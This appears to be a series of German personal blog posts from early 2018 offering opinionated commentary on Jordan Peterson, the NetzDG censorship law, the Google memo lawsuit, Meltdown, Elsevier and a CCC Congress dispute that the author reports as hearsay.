Ich achte bei meinen Verlinkungen normalerweise sehr auf die Wortwahl. Nehmt nur mal die Peterson-Empfehlung jetzt. Ich habe da nicht geschrieben, Peterson habe eine Erkenntnis. Ich habe geschrieben, er habe eine These. Ich habe mir das ausdrücklich nicht zueigen gemacht, weil die Idee in meinem Blog nicht ist, euch Dinge aufzuschwatzen, sondern euch Thesen und Theorien und Sichtweisen zu zeigen, die ihr vielleicht noch nicht auf dem Schirm hattet.
Die Idee ist, dass ihr dann die Fakten abwägt und euch eine Meinung bildet. Es freut mich daher auch immer sehr, wenn hier Mails reinkommen, die durchblicken lassen, dass ihr euch eine Meinung gebildet habt. Aber viele dieser Mails haben die Form (ich übertreibe das jetzt mal aus Illustrationsgründen schamlos): "Also ich glaube das ja nicht."
Fair enough, aber das war nicht die Frage. Ihr sollt überhaupt gar nichts glauben, schon gar nicht Dinge, die ich euch reindrücke. Es geht hier nicht um Glaubensfragen, sondern um Erkenntnis. Ihr sollt euch das anhören und dann mit rationalen Argumenten eine Abwägung treffen.
"Ich glaube das nicht" ist keine Abwägung. Da fehlt das ", weil". Und dahinter kommt bitteschön nicht sowas wie "weil 4chan auf Peterson abfährt". Davon wollen wir gerade wegkommen, dass Behauptungen nach dem beurteilt werden, der sie aufstellt! Ihr sollt lernen, das inhaltlich zu beurteilen!
Also. Ich kann euch nicht verbieten, hier katholische Kirche 2.0 zu machen, das als Glaubensfrage zu betrachten, Leute zu exkommunizieren und alle Äußerungen von exkommunizierten Familien grundsätzlich nicht zu glauben. Manche Leute kommen in ihrem Leben möglicherweise über dieses Modell nicht hinaus. Finde ich persönlich sehr deprimierend, aber mein Ziel ist nicht, die Welt zu verbessern, indem ich jeden aus meiner Sicht sich falsch verhaltenden Einwohner umerziehe. Mein Ziel ist es, Leuten, die willens und in der Lage sind, ihr Weltbild auf rationalere Füße zu stellen, dafür ein bisschen Rüstzeug zu liefern.
Daher bitte hier nochmal der Aufruf: Bitte versucht es wenigstens. Und wenn ihr keinen Bock habt, dann spart euch bitte die Mail an mich, dass ihr das nicht glaubt. Der Teil interessiert mich nicht. WARUM ihr was nicht glaubt, wenn es da Fakten und Argumente und Begründungen gibt, das ist interessant. Auch darauf kann ich dann aus Zeitgründen nicht reagieren, aber das ist wenigstens Feedback, dass meine Arbeit hier zumindest bei den richtigen Menschen ankommt, und möglicherweise was bewirkt.
Oh und "das ist doch alt" und "wie kann es sein, dass du das noch nicht kanntest"-Zuschriften sind aus meiner Sicht auch bloß Selbstdarstellung von euch und helfen weder euch noch mir weiter, weil ich sowas direkt lösche. Nur weil ich etwas jetzt ins Blog tue, heißt das nicht, dass ich das erst seit heute morgen kenne. Es heißt nur, dass ich es jetzt für den richtigen Zeitpunkt halte, und/oder dass ich jetzt einen Winkel daran gefunden habe, der gerade passt, oder den ich für interessant halte.

Fri Jan 19 2018

[l] Ich hatte kürzlich ein Video mit Jordan Peterson verlinkt, und der hat einen Haufen Videos online. Einige von denen fand ich hochinteressant, insbesondere weil seine Prämissen und Schlüsse an einigen Schlüsselstellen mir sehr fremd sind. Er vertritt beispielsweise die These, dass strukturierte Religion (die katholische Kirche) eine notwendige Lücke füllt, und wenn in der Gesellschaft der Atheismus zunimmt, dass die Lücke von anderen Kult-Handlungen gefüllt wird, und wir unter dem Strich schlechter dastehen als vorher.
Peterson hat unter anderem Vorlesungen von sich auf Youtube veröffentlicht, und deckt von Lebenshilfe (was ich als Selbsthilfe-Ratschläge aus Ratgeber-Büchern im Grabbelkasten neben der Kasse im Buchhandel klassifizieren würde) über Kunstgeschichte und Philosophie ein sehr breites Spektrum ab.
Peterson hat sich aber mit seinem Widerstand gegen ein Gesetz in Kanada Feinde gemacht, das ihm vorschreibt, mit welchen Worten er Transgender-Menschen ansprechen soll. Da wurde er Hardcore-Free-Speech-Advokat und wurde bissig (weil er fand, dass das in einem Gesetz nichts zu suchen hat, und kein Gesetz vorschreiben darf, welche Wörter wir benutzen, nicht weil er was gegen die Pronomen hatte) und seit dem verfolgt ihn ein Lynchmob. Ein paar Blogger in den USA haben ihn dann auch mal interviewt, aber der war bisher nur auf der anderen Seite des Atlantik aktiv. Bis jetzt. Jetzt hat ihn Channel 4 interviewt, das ist der größte Privatfernsehkanal in Großbritannien. Und dieses halbstündige Interview ist eine hervorragende Übung in Medienkompetenz und Journalismus. Ich würde sogar soweit gehen, dass man das jedem Journalisten in der Ausbildung zeigen sollte.
Anlass für seinen Besuch in UK ist wohl ein neues Buch, für das er jetzt die Werbetrommel rührt. Aber für mich ist das ein Zeichen, dass diese gesamte hasserfüllte Lynchmob-Gemengelage jetzt rüberschwappt aus Amerika. Bisher konnte man sich ja ein bisschen zurücklehnen und sich einreden, das sei bloß ein Problem an US-amerikanischen Universitäten. Sowas wie das Google-Memo betraf uns hier in Europa bisher nicht so. Das ist jetzt glaube ich vorbei.
Bei der BBC im Radio war Peterson auch. Es wirkt so, als hätten die Feministen spontan eine Warteschlange gebildet, um sich an ihm abzuarbeiten.
Jedenfalls, warum ich das Channel-4-Video empfehle: Das ist einer der wenigen mir bekannten Fälle, wo ein Akademiker, über dessen Arbeit berichtet wird, daneben sitzt und Gelegenheit hat, jeder Falschdarstellung direkt zu widersprechen. Journalismus versucht häufig, komplexe Zusammenhänge auf einfache Formeln runterzubrechen, damit das Publikum dem folgen kann. Typische journalistische Berichterstattung über Forschungsergebnisse sind aber praktisch immer falsch, weil Dinge falsch zusammengefasst oder unzulässig verkürzt wurden. Journalisten wissen das natürlich, und teilweise wird das ja auch absichtlich gemacht, weil man mit unzulässig zusammengefassten Schlagzeilen wie "Kaffee hilft gegen Krebs" mehr Klicks macht als mit unverständlichen vieldimensionalen Ergebnissen von Studien, die man auf einer Seite Text gar nicht kommuniziert kriegt.
Insofern Hut ab für Channel 4, dass sie die Langfassung des Interviews überhaupt aufgehoben und dann auch noch auf Youtube hochgeladen haben. Man sieht hier sehr schön, wie Journalismus häufig funktioniert, und welche rhetorischen Tricks von Journalisten erwartet werden, weil man ja möchte, dass sie den Interviewten möglichst aus der Reserve holen und konfrontieren.
Wer sich für Journalismus und die Mechanik von Interviews interessiert, sollte sich das anschauen.
Ich persönlich bin ja eher ein Freund von nicht-konfrontativen Interviews. Wenn man den Interviewten die ganze Zeit anpinkelt, kommt am Ende halt eine Serie von "das habe ich so nicht gesagt" raus, damit ist der Zuschauer nicht weiter als vorher. Ich bin ein Freund davon, den Interviewpartner reden zu lassen, ihm möglichst viel Gelegenheit zu geben, sich um Kopf und Kragen zu reden. Wobei das bei Peterson wahrscheinlich auch nicht viel gebracht hätte, der war ja wie man sehen kann exzellent vorbereitet.

Thu Jan 18 2018

[l] Weil jetzt lauter Leute nach dem Ekel-Video fragen: Das war das hier. Da geht es aber nur am Rande um Ekel, daher hatte ich das nicht direkt verlinkt. Der Ekel-Forscher dort heißt Jonathan Haidt und der hat auch dieses wirklich großartig argumentierte Video für mehr intellektuelle Diversität gemacht, das ich inhaltlich noch wichtiger finde als das Ekel-Video. Das sollte sich wirklich jeder mal in Ruhe angeguckt haben.
[l] Ich hab jetzt bestimmt 20 Einsendungen gekriegt, die man grob mit "der Maas ist gar nicht links, ICH bin links!1!!" zusammenfassen kann. Jeweils noch mit mehr Kram dran, geschenkt.
Merkt ihr gar nicht, wie sehr ihr Teil des Problems seid, wenn ihr so eine Mail schreibt?!
Maas war gefühlt allen links der CSU links genug, als er das Sexualstrafrecht verschärfte, und als sich die Leute ausmalten, wie sie mit dem NetzDG endlich ihre ganzen Feinde aus dem Internet wegzensieren können.
Ich habe dazu übrigens die Tage ein faszinierendes Video geguckt, wo es um Ekel als Emotion ging. Man würde ja denken, Völkermörder seien von Hass oder Angst getrieben, aber wenn man sich die Rhetorik von Hitler und der NSDAP gegen das Judentum anschaut, dann waren das lauter Ekel-Metaphern. Juden wurden da mit Ungeziefer und Krankheitserregern verglichen, und der Völkermord an ihnen als eine Art Reinigungsmaßnahme verkauft. Der Ekel ist aus meiner Sicht als Emotion und Motivator sehr unterbewertet.
Inhaltlich kann man den Völkermord an den Juden natürlich nicht mit Twitter-Zensurmobs vergleichen, aber schaut euch mal die Vokabeln und die Begründungen an. Schon die Idee, dass man Menschen transitiv ausgrenzen muss (DU hast DEN FEIND retweetet, also musst du jetzt auch auf die Schwarze Liste!1!!) riecht für mich sehr deutlich nach einer Ungeziefer- und Krankheits-Metapher. Alle Befallenen umbringen, sonst stecken sich noch mehr an!1!!
In rechten Zirkeln geht die Metapher sogar noch weiter, und linkes Gedankengut wird direkt als "Krebs" oder so etikettiert.
Also, liebe Leute, hört mal bitte auf, euch zu kloppen, wer jetzt wirklich links ist und wer nur so tut als sei er links. Das ist für die Fragestellung gänzlich irrelevant. Denkt einfach daran, wie so Gruppen-interne Differenzierungs-Ausreden bei den Nazis nach außen wirken, und überlegt euch mal, ob es nicht sein kann, dass eure "aber DER ist doch gar kein echter Linker!1!!"-Ausflüchte von außen genau so aussehen.
Aber der eigentlich Punkt ist ja, dass es völlig egal ist, ob Maas links ist oder nicht. Der Punkt ist, dass vorher klar war, dass das gegen euch verwendet werden wird. Es war so klar, dass ich das im Blog öffentlich angesagt habe. Niemand hat eine Ausrede. Wer vorher nichts dagegen gesagt hat, hat sich schuldig gemacht. Wer nicht aufgemuckt hat, weil er dachte, er sei schon nicht betroffen, das richte sich nur gegen "die Nazis", der hat sich schuldig gemacht und ist außerdem auch noch naiv und sollte sich mal das Niemöller-Gedicht ins Gedächtnis rufen.
Und im Übrigen sollte jeder Wahlberechtigte in diesem Lande Verantwortung für die amtierende Regierung übernehmen. Wir sind der Souverän, wir haben die da hingesetzt. Die handeln in unserem Namen. Scheiß drauf, für wie links ihr Maas haltet. Wenn der in eurem Namen Mist macht, ist das eure Verantwortung. Ihr solltet dagegen protestieren und die SPD abwählen, anstatt mir böse Mails zu schreiben, dass der Maas ja viel weniger porentief links ist als ihr selbst.
Mal ganz abgesehen davon ging es mir übrigens nicht darum, alle Linken zu beschimpfen, sondern sie anzusprechen. Ich hätte auch "ihr Idioten" schreiben können, aber das wäre unhöflich gewesen. Wenn ihr links seid und die Kritik euch nicht betrifft, dann wäre an der Stelle das rationale Verhalten gewesen, die Sache zu den Akten zu legen. Ihr wart ja offensichtlich nicht gemeint. Stattdessen heulen jetzt die ganzen getroffenen Hunde. Ich kann das nur so deuten, dass ihr euch schon angesprochen fühlt, und zwar zu Recht angesprochen, und jemanden braucht, bei dem ihr eure Ausflüchte abladen könnt, und ich stand gerade günstig in der Gegend rum. Oder so.
Update: Oh und noch wichtiger ist, dass ihr mal eure eigene Position aus der Gleichung rausnehmt. Eure Position und wer was gesagt hat. Wichtig ist, was gesagt wurde, und welche Argumente dafür vorgebracht werden, wie es begründet wird. Es wäre viel geholfen, wenn die Leute mal Debatten führen könnten, ohne ihre aktuelle Meinung als Teil ihrer Identität zu sehen und mit aller Gewalt verteidigen zu müssen.
Update: The Oatmeal hat einen schönen Beitrag zum Backfire-Effekt, der hier passt.

Tue Jan 16 2018

[l] Kennt ihr den schon? Die Weltbank reagiert auf die neue linke Regierung in Chile mit Abwertung im Ranking? Weil, das weiß doch jeder, Linke haben keine Ahnung von Wirtschaft!1!! Die machen immer nur alles kaputt, indem sie ganz viel neue Schulden aufnehmen! (Ich erwähne das deshalb, weil Trump gerade über eine Billion Dollar neue Schulden gemacht hat).
Nun, das war nicht diese Tage, die Regierung regiert schon eine Weile in Chile, und mit der Wirtschaft ging es trotz der Sabotage durch die Weltbank nicht schlechter als vorher.
Der Weltbank-Chef zeigt daher heute ein bisschen Reue. Wie? Nein, nicht, dass er das getan hat. Er bereut, wie das jetzt aussieht. Bedauerliches Misverständnis!1!

Mon Jan 15 2018

[l] In der Kommentarsektion unter dem Mark-Lilla-Artikel hat jemand dieses Essay empfohlen, und der Empfehlung schließe ich mich an. Es geht um Richard Rorty, einen Philosophen, der 2007 gestorben ist, aber vorher sehr interessante Vorhersagen gemacht hat. Er leitet Identity Politics so her:
For if you turn out to be living in an evil empire (rather than, as you had been told, a democracy fighting an evil empire), then you have no responsibility to your country; you are accountable only to humanity. If what your government and your teachers are saying is all part of the same Orwellian monologue – if the differences between the Harvard faculty and the military-industrial complex, or between Lyndon Johnson and Barry Goldwater, are negligible – then you have a responsibility to make a revolution.
Mit anderen Worten: Der Staat und seine Institutionen werden grundsätzlich komplett abgelehnt, und als nicht rettbar korrupt betrachtet, und damit fallen auch alle pragmatische und auf Zusammenarbeit und Kompromissfindung basierenden Maßnahmen weg, die man so machen könnte, und es bleibt nur noch die Revolution.
From his perspective, the problem was the total rejection of pragmatic reform. The belief that there was nothing in America that could be salvaged, no institutions that could be corrected, no laws worth passing, led to the complete abandonment of conventional politics. Persuasion was replaced by self-expression; policy reform by recrimination.

Sun Jan 14 2018

[l] Neuestes NetzDG-Opfer: Die bekannte Street-Art-Künstlerin "Barbara".
In den vergangenen Wochen hätten Facebook und Instagram Beiträge von ihr gelöscht mit der Begründung, diese verstießen gegen die Gemeinschaftsstandards, schreibt sie. Sollte sich das wiederholen, habe man ihr gedroht, ihre Profilseiten zu löschen.
Ja, die Standards. Komisch, wenn man seine Leistung und sein Selbstwertgefühl darüber definiert, wieviel Postings anderer Leute man weggemacht hat, dann sieht plötzlich immer mehr Kunst entartet aus und muss weg.
Gute Arbeit, Herr Maas! Tolles Land, in dem wir jetzt alle leben! (Danke, Arno)
[l] Wow. Ich hatte mich schon gefragt, wie die Ctrl-Left sich jetzt mit der Realität arrangiert, dass Maas und sein Zensurgesetz sich gegen sie wendet statt gegen die Nazis.
Die Antwort ist so überraschend wie sie klar ist: Geschichtsleugnung.
Stellt sich nämlich raus: Der Maas ist gar kein Linker. Das ist bloß ein verwirrter Einzeltäter. Und der gehört ja an sich eh eher zum rechten Flügel der SPD.
Nein, wirklich! Das schreiben mir jetzt hier Leute!
Und damit ist dann mal wieder alles wie immer. Im Zweifelsfall dolcht man seinen Freunden in den Rücken, wirft sie aus der In-Group raus und deklariert sie als eigentlich-ja-schon-immer-Nazis. Business as usual bei den Linken. Und eines Tages werdet ihr merken, dass keine Freunde mehr übrig sind.
Das frappierende daran ist ja, wie stark sich das mit dem Trump-Verhalten überschneidet. Das ist exakt das selbe Verhalten, das Trump an den Tag legt. Genau das selbe. Dass das bei den Linken keine Kopfschmerzen auslöst!
Problem: Unsere Ideologie kollidiert mit den Fakten.
Lösung: Fakten leugnen.
Problem: Fakten lassen sich nicht mehr leugnen, Kollision zu groß.
Lösung: Mitarbeiter feuern, und so tun, als sei das alles deren Schuld.
Problem: Wir haben uns in zu viele Lügen verstrickt, die Luft wird knapp.
Lösung: Koreakrieg!
Gut, das haben die Linken jetzt noch nicht gemacht. Nicht mit Korea. Aber neue Kriegsschauplätze aufmachen, damit keiner mehr drauf achtet, in welchem Umfang die alten verkackt wurden, das ist ja Kerngeschäft der Linken. Das — und warten auf die Oderflut, die uns rettet.

Wed Jan 10 2018

[l] Kennt ihr Kodak? Die Älteren unter euch werden sich erinnern. Die haben Foto-Film hergestellt. Ja, früher, wenn man ein Foto machen wollte, hat man einen Film belichtet. Dann ist man damit zu einem Spezialisten gegangen, der den Film "entwickelt" hat. Nach ein paar Tagen (später: vollmaschinell, eine Stunde) hat man dann die Fotos abgeholt. Nein, wirklich! Es hat Tage gedauert, bis man sehen konnte, ob das Foto was geworden ist!
Die große Hammer-Erfindung war die Sofortbildkamera von Polaroid.
OK, genug "Opa erzählt ausm Krieg". Kodak hat Film gemacht.
Als das nicht mehr lief, haben sie versucht, auf Drucker umzusteigen. Hauptsächlich Fotodrucker, klar. Lief aber auch nicht so.
Jetzt hat Kodak eine Kryptowährung angekündigt und sofort verdoppelt sich der Aktienkurs.
Da kriegste doch echt Schwielen an der Stirn vom Facepalmen.
[l] Erinnert ihr euch an diesen Google-Memo-Typen?
Der hat jetzt eine Klage eingereicht. Und ab Seite 13 wird es interessant, denn der hat Screenshots von E-Mails mitgebracht. Falls ihr also mal sehen wolltet, wie es bei Google intern so abgeht, aber ihr wollt dafür nicht bei Google anheuern, dann ist jetzt eure Gelegenheit.
Ich finde das vor allem deshalb spannend, weil das die Leute sind, die euren Browser schreiben, die über AMP und Social-Media-Buttons und Analytics praktisch eure gesamte Browser-History sehen können, die daraus sogar ein Geschäftsmodell gemacht haben, euch besser zu stalken als andere Handlanger der Werbemafia. Die Leute, die im Wesentlichen für ihr Tun nichts vorzubringen haben außer "vertraut uns, unsere moralischen Werte sind so stark, dass wir eure Daten nie missbrauchen würden".
Aus der Perspektive finde ich es ausgesprochen interessant, wie stark deren moralische Werte tatsächlich sind. Um das zu messen braucht man einen Fall, wo so jemand auf jemanden trifft, dem sie viel Schaden zufügen können, und den sie nicht mögen. Das hier ist genau so ein Fall.
Achtung für Zartbeseitete: Das ist eine Anklage, die nennen Namen. Es geht nicht um die Namen oder die Einzelpersonen. Das ist verdammt nah an einem Internetpranger, aber in einer Anklage muss man halt Namen nennen. Wer sowas lieber nicht sehen will, klickt da lieber nicht drauf.
Update: Exhibit B ist eine Liste von "Anti-conservative postings", u.a. Meme-Bilder. Geht bei ca 50% im Dokument los.
Update: Ich finde es auffällig, wie viele aus dem Management Frauen sind. Sein Manager, die HR-Abteilung, die Beschwerdestelle, ... genau wie in Hollywood nur anders herum :-) Ich vermute, dass das an der Quote liegt. Wenn sie ein Quote haben, aber nicht genug weibliche Ingenieure kriegen, nehmen sie halt weibliche Manager? Oder so? Und die reagieren natürlich alle genau so, wie umgekehrt in Hollywood die Männer reagiert haben. Sind nicht in der Lage, die Prämisse überhaupt zu akzeptieren, dass sie nicht auf der guten Seite stehen sondern von ihrer Seite Diskriminierung ausgeht und/oder befördert wird. Und Abwiegeln statt Kurskorrektur.

Mon Jan 8 2018

[l] Bei dem Meltdown-Bug ist mir gerade was aufgefallen, das ich mal mit euch teilen will.
Und zwar hat Intel seit Jahren in ihrem Prozessoren "Hyperthreading", deren Markennamen für eine Technik namens Simultaneous Multithreading (SMT). Bei Intel bringt das so 20% Mehrleistung, wenn man einen zweiten Thread startet und der auf dem virtuellen Core läuft. Kommt natürlich immer auf den Code an, klar.
AMD hat seit Ryzen auch SMT, aber bei denen bringt das 40%. Ich habe mich die ganze Zeit gefragt, wieso. Jetzt glaube ich, die Erklärung zu haben.
Und zwar hat Intel ja, wie wir jetzt wissen, bei ihrer spekulativen Ausführung von Instruktionen beschissen, und hat den Load vor den Zugriffscheck vorgezogen. Der Load wird schon gemacht, wenn die CPU sich noch nicht sicher ist, ob der Load erlaubt sein wird (die Prüfung davon kostet auch Zeit). Wenn Intel dann feststellt, dass der Load nicht erlaubt war, ist es nicht schlimm, wenn die Daten in den Cache geladen wurden, denkt sich Intel. Und das lief auch jahrelang prima, bis jemandem auffiel, dass das ein Sicherheitsproblem ist.
So, nehmen wir mal an, Intel hätte nicht auf diese Art für Benchmarks beschissen. Was wäre der Effekt gewesen? Die Latenz für die Load-Instruktionen wäre hoch gegangen. Und was macht die CPU, wenn gerade irgendwas hängt (weil die Latenz zu hoch ist)? Sie führt per SMT einen anderen Thread aus. Das ist die Idee von SMT.
Was, so frage ich mich gerade, wenn die 20% mehr SMT-Performance bei AMD genau die 20% sind, die Intel hier durch Senken der Sicherheit rausgeschummelt hat? AMD hat einfach ehrlich gestallt in den Fällen. Und das geht jetzt dank SMT nicht mehr verloren.
Ich fühlte mich spontan an Dieselgate erinnert. :-)

Sat Jan 6 2018

[l] Twitter nimmt Stellung zu der Frage, wieso realDonaldTrump noch nicht zugemacht wurde.

Fri Jan 5 2018

[l] Oh wow. Elsevier gibt Wissenschaftlern an deutschen Unis weiter Zugang zu ihren Journals, obwohl die Unis gerade nicht ihre Lizenzgebühren weiterzahlen. Die sind offiziell in Verhandlungen mit Elsevier und haben sich zur Stärkung ihrer Position zusammengeschlossen. Die wollen ungefähr halb so viel zahlen wie bisher (geschenkt ist noch zu viel, wenn ihr mich fragt).
Und Elsevier ist jetzt auf ganzer Linie eingeknickt. Ich kann mir das nur so erklären, dass sie echt ganz doll Angst haben, dass auch der letzte Kunde merkt, dass es auch genau so gut ohne Elsevier geht. Die werfen ja schlicht nichts in die Waagschale auf ihrer Seite. Die Artikel kommen nicht von Elsevier, der Peer Review wird von unbezahlten Freiwilligen gemacht, und die Akademiker zahlen Elsevier noch dafür, dass ihr Scheiß publiziert wird. Und dann will Elsevier auch noch, dass die Unis nochmal zahlen. Wie dieser Deal jemals zustande kommen konnte, muss mir mal jemand erklären. Ich verstehe es nicht.

Thu Jan 4 2018

[l] Steve Bannon ist doch aus dem Weißen Haus rausgeflogen, und hat natürlich nach der initialen Schockphase angefangen, ein Buch zu schreiben. Daraus sind jetzt aus Werbegründen ein paar knackige Auszüge bekannt gemacht worden.
Und Trump? Der verhält sich, wie man das von einem ordentlichen Twitter-Mimimi erwarten würde, und schickt seine Anwälte los. Und zwar mit der geilsten Begründung aller Zeiten:
Lawyers on behalf of President Donald Trump sent a letter Wednesday night to former White House Chief Strategist Stephen Bannon demanding he refrain from making disparaging comments against the president and his family.
Der hat gemeine Dinge über mich gesagt!!1!
Bevor er nach Mama ruft, sollte er vielleicht nochmal ins Archiv gucken, was er so über Obama und die Clintons gesagt hat.
Update: Das Buch ist nicht von Bannon, sondern es basiert auf Interviews mit ihm (und 200 anderen Leuten). Aber Bannons Statements dominieren gerade ein bisschen die Mediendarstellung dazu.

Sat Dec 30 2017

[l] Weil ich jetzt mehrfach darauf angesprochen wurde: Auf Twitter kursieren Geschichten, dass der CCC Vergewaltiger reinlässt, oder gar Vergewaltigung befördert, verschiedene Vorwürfe dieser Art.
Ich bin weder im CCC noch kenne ich das Opfer oder den Beschuldigten. Ich habe überhaupt keinen privilegierten Zugriff auf die Wahrheit und würde mich am liebsten gar nicht äußern, weil ich nichts sagen kann. Aber bei mir türmen sich die besorgen Zuschriften, daher hier kurz, was ich gehört habe. Das ist alles Hörensagen aus 2. und 3. Hand, ich weiß gar nichts. Bitte nichts davon als Faktenbehauptung betrachten.
Vorgeschichte: ~~Auf dem letzten Camp in den Niederlanden~~ gab es anscheinend einen ~~sexuellen~~ Übergriff von einem Mann auf eine Frau. Die ist ins Krankenhaus gefahren, wo Gewaltspuren festgestellt wurden. Sie hat Anzeige erstattet, die Polizei hat ermittelt, die Ermittlungen wurden eingestellt und keine Anklage erhoben. Der Beschuldigte wehrt sich nach Kräften gegen die Vorwürfe.
Dann jetzt, im Sommer: Die Frau meldet sich beim CCC und fordert, den Beschuldigten nicht auf dem Congress reinzulassen. Der CCC ist mit der Situation erstmal überfordert und braucht eine Weile für die Reaktion. Sie finden inzwischen selber, dass sie zu lange gebraucht haben. Ich weiß nicht, wie lange sie gebraucht haben, oder wie lange man für sowas brauchen sollte. Ich gebe das nur wieder. Ergebnis der CCC-Beratungen war, dass man der Frau sagte, der CCC könne oder wolle diesem Typen nicht Hausverbot erteilen. Aber man verstehe ihre Situation und bot ihr an, dass sie sich von Security-Engeln begleiten lässt, und das Awarenessteam stand auch bereit, und wenn irgendwas ist, werde man sofort einschreiten und dafür sorgen, dass diesmal genügend Augenzeugen und Beweise für eine Anklage zur Verfügung stehen.
Daraufhin schwappt die Geschichte auf Twitter herum, wo sich dann die "der CCC besteht aus frauenhassenden Männern" und "CCC are Rape Enablers" Anklagen gegen den Club mehrten.
Am Ende kam dann die Frau zum Congress, und der Mann war wohl auch da (?). Aber es passierte nichts weiter, die Frau hat selbst auf Twitter Selfies von sich publiziert, wie sie glücklich in die Kamera lächelnd frohlockend durch die Assemblies zieht und offenkundig Spaß am Gerät hat. Der CCC betrachtete daraufhin die Angelegenheit als friedlich begelegt.
So, jetzt meine Bewertung dieses Sachverhalts, unter der Annahme, dass diese Darstellung tatsächlich der Wahrheit entspricht.
Wegen des Krankenhaus-Aspekts glaube ich persönlich der Frau, dass es da einen Übergriff gab, und dass sie auch auf den richtigen Täter gezeigt hat. Ich glaube aber auch an die Unschuldsvermutung und an ordentliche Gerichtsverfahren und das Recht, gehört zu werden, und sich anwaltlich vertreten zu lassen, und so weiter. Der Schiedsrichter von Schuld in unserer Gesellschaft sind Gerichte. Solange nicht ein Richter in einem ordentlichen Verfahren nach Sichtung aller Beweise und unter fairer Würdigung aller Fakten entscheidet, dass der Mann das getan hat, ist er nicht Täter sondern Beschuldigter. Und das reicht in meinem Wertesystem halt nicht. Der CCC war hier sicher nicht in einer einfachen Situation, aber ich finde die Entscheidung richtig. Alle anderen Optionen wären noch schlechter gewesen.
Beachtet bitte auch, dass in dem Hörensagen oben nur die Seite der Anklage zu Wort kam.
Auf mich wirkt die ganze Chose, als wollten da ein paar Aktivisten, aufs Prinzip pochend, am CCC ein Exempel statuieren, weil sie eben wissen, dass der CCC eine eher progressive Organisation ist, und die Mitglieder ein Unrechtsgefühl haben, dass man vergleichsweise leicht triggern kann. In diesem Fall hat sich dann aber der erwartete Lynchmob nicht spontan formiert, und da haben die Aktivisten eben noch ein bisschen an ihrer Instigier-Methodologie getweaked, aber das hat auch nicht gefruchtet. Ich nehme die ursprüngliche Anklägerin übrigens explizit aus, wenn ich hier von Aktivisten rede. Damit meine ich andere Leute, die nicht persönlich betroffen sind, den CCC teilweise auch gar nicht näher kennen, aber für die "gute Sache" unter den Bus zu werfen gewillt waren.
Aber das ist wie gesagt nur meine Deutung. Kommt am besten zu eurer eigenen Deutung. Oder glaubt dem CCC, hier nicht leichtfertig oder willkürlich entschieden zu haben.
Ich persönlich finde es gut und richtig, dass der CCC sich nicht zum Richter aufschwingt, und Leute bestraft. Das sollte der CCC nicht nur nicht tun, das darf der CCC nicht tun. Ich kann aber verstehen, dass man hierzu auch eine andere Position haben kann.
Update: Wie zu erwarten war, sind bei der Darstellung oben einige Teile falsch, oder jedenfalls behaupten Leute das. Ich werde jetzt aber nichts korrigieren oder updaten. Ich kann nichts davon nachprüfen und will nicht den Eindruck erwecken, als hätte ich irgendwelche geprüften Informationen. Das ist aus meiner Sicht gerade der Punkt bei dieser ganzen Geschichte, dass das alles Hörensagen und Behauptungen sind.
Update: Zumindest eine Sache ist definitiv falsch, nämlich dass es auf der SHA eine Vergewaltigung oder einen Übergriff gab. Genau wie mit dem CCC hat die Anklägerin das auch mit der SHA gemacht, und der Beschuldigte kam da gar nicht erst rein. Und aus Gerechtigkeitsgründen will ich hier mal noch ausführen, was mir inzwischen von der Story der Gegenseite erzählt wurde. Bitte auch alles als Hörensagen betrachten, ich kann da nichts von prüfen. Also: a) es gibt keine Anzeige bei der Polizei, sie hat nur ein Statement bei denen zu Protokoll gegeben, b) die sind/waren ein Paar und es handelt sich um einen Vorfall bei denen zuhause, nicht auf der SHA, c) sie hat dann bei der SHA dafür gesorgt, dass er nicht reinkommt, weil die es nicht für nötig hielten, den Beklagten anzuhören, d) der CCC hat den Beklagten angehört und dessen Seite der Story klang genau so glaubwürdig wie ihre. ~~Sie rennt jetzt halt von Gizmodo zu Buzzfeed und gibt Interviews~~ (Buzzfeed sagt dazu, sie habe ein Interview abgelehnt), und rennt von SHA zu CCC und will den rausgeworfen haben. Und er sitzt zuhause und versucht Schadensbegrenzung. Ihr erklärtes Ziel scheint zu sein, den Typ jetzt überall auf die schwarze Liste zu setzen, wo der jemals in seinem Leben Freunde oder eine gute Zeit hatte. Als sich rausstellte, dass der CCC auch den Beklagten angehört hat, hat sie aufgehört, mit dem CCC zu reden, und macht jetzt nur noch Napalm-Flächenbombardement über Twitter und die Presse.
Ich habe da wie gesagt keine Aktien in der gesamten Sache. Aber jetzt habt ihr aus beiden Seiten das Hörensagen gehört. Ich rufe euch alle ausdrücklich dazu auf, euch in anderer Leuten Disputen nicht auf eine Seite zu stellen, bevor ihr nicht sicher seid, dass ihr wisst, was wirklich passiert ist. Mein Eindruck ist, dass beide Seiten Hilfe brauchen, aber nicht Hilfe dabei, den jeweils anderen plattzumachen.
Der Winkel mit Vergewaltigung scheint übrigens komplett Bullshit zu sein. Die Vorwürfe handeln von Gewalt, nicht von sexualisierter Gewalt. Das haben nur im Rahmen der Metoo-Debatte gerade alle sofort da reingelesen, dass es was mit sexueller Gewalt zu tun gehabt haben könnte.
Update: Ich bin darauf hingewiesen worden, dass der Stil des Hörensagens in die eine Richtung abwiegelnder klingt als in die andere Richtung. Das ist auf meine Ausgeschlafenheit und die Tageszeit und das unterschiedliche Stresslevel zurückzuführen und war weder beabsichtigt, noch soll es eine Wertung ausdrücken. Nehmt es als Medienkompetenzschulung.

Wed Dec 27 2017

[l] Erste Eindrücke vom 34c3: Wow. Groß.
Leipzig ist im Vergleich zu Berlin oder Hamburg kleiner, und man merkt es ein bisschen am ÖPNV. Mein Hotel liegt zwischen Hauptbahnhof und Messe, und wenn ich da in die Tram einsteigen will, dann ist die halt schon voll. Und die angekündigte Zugfrequenz nachts erscheint mir auch zu wenig, aber werden wir ja sehen.
Dafür hängen an den Haltestellen neue Beschilderungen aus, "Messe / Chaos Communication Congress 2017". Ich denke mal, auf dem Service sollte der CCC ab jetzt überall bestehen :-)
Von der Einführungsveranstaltung mit Tim Pritlove habe ich leider das meiste verpasst, weil die mich wegen Überfüllung nicht in den Raum lassen wollten. Dann kam ich gegen Ende doch rein, und wurde im Dunkeln einmal um die Bühne geleitet, die mit Tribünen in der Messehalle aufgebaut wurde, und dann so von hinten seitlich auf den Hang geschickt. Da angekommen breitete sich vor mir eine geradezu atemberaubende Menschenmenge auf. Ich hörte etwas von "4000 Sitze", das ist noch mal 1000 mehr als in dem eh schon krass großen Saal 1 im CCH.
